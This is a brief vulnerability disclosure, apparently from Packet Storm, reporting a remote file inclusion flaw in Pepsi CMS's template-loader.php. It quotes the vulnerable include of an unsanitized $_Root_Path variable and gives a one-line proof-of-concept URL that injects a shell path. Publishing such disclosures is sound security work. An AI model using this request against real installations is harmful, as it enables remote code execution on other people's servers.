Pepsi CMS is vulnerable to a remote file inclusion vulnerability.
d0357cd6c292459d025899f85ef82d0a407cd5cca2cb6c641caa98d5577bba6bDear Packetstormsecurity !
I found Vulnerability in Pepsi CMS
here is the description
=======================================
<http://docs.google.com/Doc?id=dgq3x7pn_1026z464gw>Pepsi CMS
(template-loader.php) Remote File Include
=======================================
*::Home:
* http://sourceforge.net/projects/pepsicms/
*
::Vuln Type :
* Remote File Include (RFI)
*::Discovered by :
* Rohit Bansal
*::Vuln Code:
*/includes/template-loader.php
include( 'config.php' );
include( 'db.php' );
//include( 'classes/theme_engine/engine.php' );
include( $_Root_Path . 'classes/Smarty.class.php' );
*PoC:
*/includes/template-loader.php?_Root_Path=[SHELL]??
Greetz: whizgeeks, infysec
=============================================
I hope You will post that Vulnerability in "Vulnerability section"
Tell me if I need to change something.
Thanks and Regards
Rohit Bansal
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed